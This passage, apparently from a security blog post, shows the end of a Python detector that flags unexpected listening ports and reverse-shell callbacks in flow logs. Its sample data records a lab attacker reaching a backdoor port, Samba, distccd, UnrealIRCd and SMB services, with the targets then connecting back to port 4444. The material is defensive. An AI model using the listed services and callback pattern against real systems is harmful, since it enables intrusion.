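    Returns alerts as (timestamp, host, kind, detail); kind is 'unexpected-listener' or 'callback'."""
    alerts = []
    last_inbound = {}  # (server, peer) -> (time, service port) of the latest connection peer -> server
    for ts, src, sport, dst, dport in sorted(flows, key=lambda f: f[0]):
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if dst in baseline:
            if dport not in baseline[dst]:
                alerts.append((ts, dst, "unexpected-listener",
                               f"{src}:{sport} connected to port {dport}, which is not in the baseline"))
            last_inbound[(dst, src)] = (t, dport)
        if src in baseline:
            prior = last_inbound.get((src, dst))
            if prior and t - prior[0] <= window:
                gap = int((t - prior[0]).total_seconds())
                alerts.append((ts, src, "callback",
                               f"outbound to {dst}:{dport} {gap}s after inbound on port {prior[1]}"))
    return alerts


# Constructed flow records built from the session lines in the post (attacker 192.168.222.59:4444),
# plus two ordinary connections that must not alert.
SAMPLE_FLOWS = [
    ("2021-08-18 17:39:30", "192.168.222.59", 50001, "192.168.222.127", 21),    # FTP login, Example 1
    ("2021-08-18 17:39:36", "192.168.222.59", 50002, "192.168.222.127", 6200),  # backdoor shell port
    ("2021-08-19 05:29:30", "192.168.222.59", 51234, "192.168.222.127", 139),   # Samba, Example 4
    ("2021-08-19 05:29:39", "192.168.222.127", 34804, "192.168.222.59", 4444),  # target calls back
    ("2021-08-19 10:37:40", "192.168.222.59", 51300, "192.168.222.127", 3632),  # distccd, Example 6
    ("2021-08-19 10:37:49", "192.168.222.127", 50819, "192.168.222.59", 4444),
    ("2021-08-19 10:52:05", "192.168.222.59", 51350, "192.168.222.127", 6667),  # UnrealIRCd, Example 7
    ("2021-08-19 10:52:15", "192.168.222.127", 44450, "192.168.222.59", 4444),
    ("2021-08-19 12:33:05", "192.168.222.59", 51400, "192.168.222.205", 445),   # SMB, Example 11
    ("2021-08-19 12:33:18", "192.168.222.205", 49166, "192.168.222.59", 4444),
    ("2021-08-19 12:40:00", "192.168.222.127", 40001, "10.0.0.9", 80),          # normal outbound web
    ("2021-08-19 13:00:00", "192.168.222.59", 51500, "192.168.222.127", 22),    # SSH, no callback
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_FLOWS):
        print(*alert)
```

Egress filtering on the servers (no outbound connections to arbitrary ports) breaks every reverse TCP session shown above, which is why the callback rule is worth alerting on even when the exploited service is unknown.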

      Cogeanu Marius, https://cogeanu.com